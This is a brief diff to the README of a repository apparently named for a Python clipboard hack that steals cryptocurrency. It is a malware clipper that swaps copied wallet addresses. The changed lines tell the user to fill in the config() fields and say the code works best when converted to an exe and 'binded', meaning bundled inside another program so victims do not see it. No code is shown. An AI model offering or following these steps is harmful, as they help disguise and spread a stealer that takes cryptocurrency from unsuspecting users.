ElmanTr/Cryptocurrencies-hack-with-clipboard-in-python/README.md

 Next open the source code and fill out config() function fields in source code !

-Attention !
-This code works perfectly when it is converted to exe!
+Attention!
+This code works perfectly if it is converted to exe and binded!

 Done !
-Enjoy !
+Enjoy :)!